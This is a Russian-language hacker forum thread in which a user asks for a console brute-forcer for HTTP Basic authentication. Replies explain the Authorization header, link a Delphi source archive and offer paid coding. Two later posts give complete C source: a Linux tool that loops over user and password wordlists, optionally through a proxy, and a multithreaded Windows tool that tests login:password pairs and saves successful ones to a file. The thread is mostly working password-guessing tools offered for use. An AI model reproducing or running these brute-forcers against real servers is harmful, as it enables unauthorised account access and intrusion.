брут для basic auth

Discussion in 'С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby' started by Sharky, 21 Feb 2008.

  1. Sharky

    Sharky Elder - Старейшина

    Joined:
    1 May 2006
    Messages:
    487
    Likes Received:
    312
    Reputations:
    46
    помогите написать брут для basic-auth на си си++ или дельфях
     
  2. z01b

    z01b Муджахид

    Joined:
    5 Jan 2007
    Messages:
    494
    Likes Received:
    382
    Reputations:
    22
    Я сомневаюсь что ктото здесь будет писать за тебя. Начинай и если будут вопросы задавай и юзеры постораються ответить.
     
    1 person likes this.
  3. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    зачем изобретать велосипед?
    brutus aet2
     
  4. zl0y

    zl0y Banned

    Joined:
    13 Sep 2006
    Messages:
    371
    Likes Received:
    270
    Reputations:
    109
    про велосипед вобще никто не спрашивал,не одобряю.
     
  5. Sharky

    Sharky Elder - Старейшина

    Joined:
    1 May 2006
    Messages:
    487
    Likes Received:
    312
    Reputations:
    46
    если бы мне нужен был брутус я бы не спрашивал..мне нужен свой консольный брут...искал в инете инфу чтот ничего путного не нашёл
     
  6. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    юзай сокеты... Прими ответ от басика и там уже думай
     
  7. Jes

    Jes Elder - Старейшина

    Joined:
    16 Apr 2007
    Messages:
    370
    Likes Received:
    391
    Reputations:
    34
    тоесть :

    "GET /private/index.html HTTP/1.0
    Host: localhost
    Authorization: Basic " + Convert.ToBase64String(new ASCIIEncoding().GetBytes(username + ":" + Password))

    а именно: строку в хидер:
    Authorization: Basic ... + строку вида : Логин и Пароль через двоеточие - в Base64 ...
     
    2 people like this.
  8. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
    _http://badnewsforyou.narod.ru/webhacker.rar
    Залил исходник(Делфе :cool: ) программы наподобие брутус ает
     
    #8 Ch3ck, 21 Feb 2008
    Last edited: 22 Feb 2008
    1 person likes this.
  9. nerezus

    nerezus Banned

    Joined:
    12 Aug 2004
    Messages:
    3,191
    Likes Received:
    729
    Reputations:
    266
    за $30 напишу
     
  10. Digimortal

    Digimortal Banned

    Joined:
    22 Aug 2006
    Messages:
    471
    Likes Received:
    248
    Reputations:
    189
    пример под линух by И.Скляров..
    Code:
    #include <stdio.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <netdb.h>
    #include <string.h>
    
    #define USER "users.txt"
    #define PASS "words.txt"
    #define CATALOG "/admin/"
    
    static char table64[]=
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    
    char *port_host;
    char *name;
    
    void token(char *arg)
    {
      name = strtok(arg, ":");
      port_host = strtok(NULL, "");
      
      if (port_host == NULL)
        port_host = "80";
    }
    
    void base64Encode(char *intext, char *output)
    {
      unsigned char ibuf[3];
      unsigned char obuf[4];
      int i;
      int inputparts;
    
      while(*intext) {
        for (i = inputparts = 0; i < 3; i++) { 
          if(*intext) {
            inputparts++;
            ibuf[i] = *intext;
            intext++;
          }
          else
            ibuf[i] = 0;
        }
                           
        obuf [0] = (ibuf [0] & 0xFC) >> 2;
        obuf [1] = ((ibuf [0] & 0x03) << 4) | ((ibuf [1] & 0xF0) >> 4);
        obuf [2] = ((ibuf [1] & 0x0F) << 2) | ((ibuf [2] & 0xC0) >> 6);
        obuf [3] = ibuf [2] & 0x3F;
    
        switch(inputparts) {
        case 1: /* only one byte read */
          sprintf(output, "%c%c==", 
                  table64[obuf[0]],
                  table64[obuf[1]]);
          break;
        case 2: /* two bytes read */
          sprintf(output, "%c%c%c=", 
                  table64[obuf[0]],
                  table64[obuf[1]],
                  table64[obuf[2]]);
          break;
        default:
          sprintf(output, "%c%c%c%c", 
                  table64[obuf[0]],
                  table64[obuf[1]],
                  table64[obuf[2]],
                  table64[obuf[3]] );
          break;
        }
        output += 4;
      }
      *output=0;
    }
    
    int main(int argc, char **argv)
    {
      FILE *fd1, *fd2;
      int sd, bytes;
      char buf1[250], buf2[250];
      char buf[250];
      char str1[270], str2[100];
      struct hostent* host;
      struct sockaddr_in servaddr;
      char rez[2000];
      char c[600];
    
      if (argc < 2 || argc > 3) {
        fprintf(stderr, "Usage: %s host[:port] [proxy][:port]\n\n", argv[0]);
        exit(-1);
      }
    
      if (argc == 3)
        token(argv[2]);
      else
        token(argv[1]); 
    
      if ( (host = gethostbyname(name)) == NULL) {
        herror("gethostbyname() failed");
        exit(-1);
      }
    
      bzero(&servaddr, sizeof(servaddr));
      servaddr.sin_family = AF_INET;
      servaddr.sin_port = htons(atoi(port_host));
      servaddr.sin_addr = *((struct in_addr *)host->h_addr);
    
      if ( (fd1 = fopen(USER, "r")) == NULL) {
        perror("fopen() failed");
        exit(-1);
      }
    
      while(fgets(buf1, 250, fd1) != NULL)
      {
        buf1[strcspn(buf1, "\r\n\t")] = 0;
        if (strlen(buf1) == 0) continue;
    
        if( (fd2 = fopen(PASS, "r")) == NULL) {
          perror("fopen() failed");
          exit(-1);
        }
    
        while(fgets(buf2, 250, fd2) != NULL)
        {
          buf2[strcspn(buf2, "\r\n\t")] = 0;
          if (strlen(buf2) == 0) continue;
    
          sprintf(c, "%s:%s", buf1, buf2);
          base64Encode(c, rez);
    
          if ( (sd = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
    	perror("socket() failed");
    	exit(-1);
          }
            
          if (connect(sd, (struct sockaddr *)&servaddr, sizeof(servaddr)) == -1) {
    	perror("connect() failed");
    	exit(-1);
          }
    
          if (argc == 2)
    	sprintf(str1, "GET %s HTTP/1.1\r\n", CATALOG);
          else
    	sprintf(str1, "GET http://%s%s HTTP/1.1\r\n", argv[1], CATALOG);
    
          sprintf(str2, "Host:%s\r\nAuthorization: Basic %s\r\n\r\n", argv[1], rez);
    
          send(sd, str1, strlen(str1), 0);
          send(sd, str2, strlen(str2), 0);
    
          bzero(buf, 250);
        
          bytes = recv(sd, buf, sizeof(buf)-1, 0);
          buf[bytes] = 0;
    
          if (strstr(buf, "200 OK") != NULL) {
            printf("======================================\n");
            printf("%s", str1);
         
            printf("%s\n", str2);
    	printf("Result OK: %s\n", c);
            printf("======================================\n");
          }
        
          close(sd); 
        }
      }
    
      return 0;
    }
     
  11. nc.STRIEM

    nc.STRIEM Members of Antichat

    Joined:
    5 Apr 2006
    Messages:
    1,036
    Likes Received:
    347
    Reputations:
    292
    Тоже написал
    Code:
    #include <winsock2.h>
    #include <stdio.h>
    #include <conio.h>
    
    #pragma comment(lib,"ws2_32")
    
    #define PACK			"GET %s HTTP/1.0\r\nHost: %s\r\nAuthorization: Basic %s\r\n\r\n"
    #define KR				128
    
    ////////////////////////////////////////////////////////////////////////
    FILE *fr;
    char pack[128];
    int CurThr;
    sockaddr_in ClientService;
    int CLsize;
    char host[128];
    char path[128];
    int THR;
    int PL;
    int so;
    int p_good, p_bad, p_er;
    int fl;
    char fwr[128];
    struct pp{
    	char p[128];
    	int st;
    	int tr;
    };
    pp *pass;
    
    
    static const unsigned char base64digits[] =
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    
    #define BAD 255
    static const unsigned char base64val[] = {
        BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD,
    		BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD,
    		BAD,BAD,BAD,BAD, BAD,BAD,BAD,BAD, BAD,BAD,BAD, 62, BAD,BAD,BAD, 63,
    		52, 53, 54, 55,  56, 57, 58, 59,  60, 61,BAD,BAD, BAD,BAD,BAD,BAD,
    		BAD,  0,  1,  2,   3,  4,  5,  6,   7,  8,  9, 10,  11, 12, 13, 14,
    		15, 16, 17, 18,  19, 20, 21, 22,  23, 24, 25,BAD, BAD,BAD,BAD,BAD,
    		BAD, 26, 27, 28,  29, 30, 31, 32,  33, 34, 35, 36,  37, 38, 39, 40,
    		41, 42, 43, 44,  45, 46, 47, 48,  49, 50, 51,BAD, BAD,BAD,BAD,BAD
    };
    #define DECODE64(c)  ((c > 32 && c<127)? base64val[(int)c] : BAD)
    
    char* en64 (const char *in, char *out, int inlen)
    {
        for (; inlen > 0; inlen -= 3, in+=3)
        {
    		
    		*out++ = base64digits[in[0] >> 2];
    		*out++ = base64digits[((in[0]&3)<<4) | ((inlen > 1)?(in[1]>>4):0)];
    		*out++ = (inlen > 1)? base64digits[((in[1] << 2) & 0x3c) | ((inlen > 2)? (in[2] >> 6) : 0)]: '=';
    		*out++ = (inlen > 2)? base64digits[in[2] & 0x3f] : '=';
        }
        *out = '\0';
        return out;
    }
    
    
    DWORD  WINAPI check(LPVOID i)   
    {
    	char header[256];
    	char b64t[200];
    	en64(pass[(int)i].p, b64t, strlen(pass[(int)i].p));
    	sprintf(header, pack,   b64t);
    	SOCKET ksocket;
    	int len;
    	char buff[32];
    	FILE *fw;
    
    		ksocket=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    		if(connect( ksocket, (SOCKADDR*) &ClientService, CLsize ) == SOCKET_ERROR)
    		{
    			pass[(int)i].tr = 0;
    			CurThr--;
    			p_er++;
    			return false;
    		}
    		len = send(ksocket, header, strlen(header), 0);
    		if(len == SOCKET_ERROR)
    		{
    			pass[(int)i].tr = 0;
    			CurThr--;
    			p_er++;
    			return false;
    		}
    		buff[recv(ksocket, buff, 32, 0)] = '\0';
    
    		if(strstr(buff, "200 OK") != NULL)
    		{
    			if(fl) Sleep(50);
    			fl=1;
    			fw=fopen(fwr, "ab");
    			fprintf(fw,"%s\n", pass[(int)i].p);
    			fclose(fw);
    			fl=0;
    			p_good++;
    		}
    		else p_bad++;
    		closesocket(ksocket); 
    
    		pass[(int)i].st=0;
    		pass[(int)i].tr = 0;
    		CurThr--;
    		PL--;
    	return true;
    }
    
    
    DWORD  WINAPI READ(LPVOID x) 
    {
    	int i;
    
    	for(i=0; i<KR; i++)
    	{
    		pass[i].st=0;
    		pass[i].tr=0;
    	}
    	i=0;
    	while(!feof(fr))
    	{
    		if(i >= KR)	i=0;
    
    		if(pass[i].st == 0 && pass[i].tr == 0)
    		{
    			fgets(pass[i].p, 128, fr);
    			pass[i].p[strcspn(pass[i].p, "\r\n\t")] = 0;
    			pass[i].st=1;
    			PL++;
    		}
    		i++;
    	}
    	PL--;
    	fclose(fr);
    	
    	return true;
    }
    
    
    DWORD  WINAPI info(LPVOID x) 
    {
    	while(so) 
    	{	
    		system("cls");
    		printf("Target: %s%s\n", host, path);;
    		printf("Thread: %d/%d\n", CurThr, THR);
    		printf("Founr: %d\n", p_good);
    		printf("Bad: %d\n", p_bad);
    		printf("Error: %d\n", p_er);
    		Sleep(500);	
    	}
    	return true;
    }
    
    
    int main(int argc, char *argv[])
    {
    
    	if(argc < 6)
    	{
    		printf("USE: host path tread filePass fileResult\n");
    		return 0;
    	}
    
    	strcpy(host, argv[1]);
    	strcpy(path, argv[2]);
    	THR=atoi(argv[3]);
    	strcpy(fwr, argv[5]);
    	
    	fr=fopen(argv[4], "rb");
    	if(!fr)
    	{
    		printf("File not found\n");
    		return 0;
    	}
    
    	WSADATA wsaData;
    	if (WSAStartup(MAKEWORD(2,2), &wsaData) != NO_ERROR)
    	{
    		printf("Error at WSAStartup()\n");
    		return 0;
    	}
    
    	struct hostent *Ip = gethostbyname(host);
    	if(Ip == NULL) 
    	{
    		printf("Error at gethostbyname()\n");
    		return 0;
    	}
    	ClientService.sin_family = AF_INET;
    	ClientService.sin_addr.s_addr = inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr)));
    	ClientService.sin_port = htons(80);
    	CLsize=sizeof(ClientService);
    
    	DWORD thID;
    	pass = new pp[KR];
    	CurThr=0;
    	p_good=0;
    	p_bad=0;
    	p_er=0;
    	int i=0;
    	PL=1;
    	so=1;
    	fl=0;
    	sprintf(pack, PACK, path, host, "%s");
    	CreateThread(0, 0, READ, (LPVOID)0, 0, &thID); 
    
    	CreateThread(0, 0, info, (LPVOID)0, 0, &thID);
    	Sleep(1000);
    	while(PL != 0 || CurThr != 0)
    	{
    		if(CurThr >= THR)
    		{
    			Sleep(100);
    			continue;
    		}
    		if(i >= KR)	i=0;
    		if(pass[i].st == 1 && pass[i].tr == 0)
    		{
    			pass[i].tr = 1;
    			CurThr++;
    			CreateThread(0, 0, check, (LPVOID)i, 0, &thID);
    		}
    		i++;
    	}
    
    	fclose(fr);
    	Sleep(1000);
    	so=0;
    	system("pause");		
    	return 1;
    }
    
    USE: host path tread filePass fileResult
    например
    brut.exe localhost /1.php 50 pass.txt result.txt

    файл с паролямив форммате
    Code:
    логин:пароль
    логин:пароль
    логин:пароль
    
     
    #11 nc.STRIEM, 24 Feb 2008
    Last edited: 24 Feb 2008
    1 person likes this.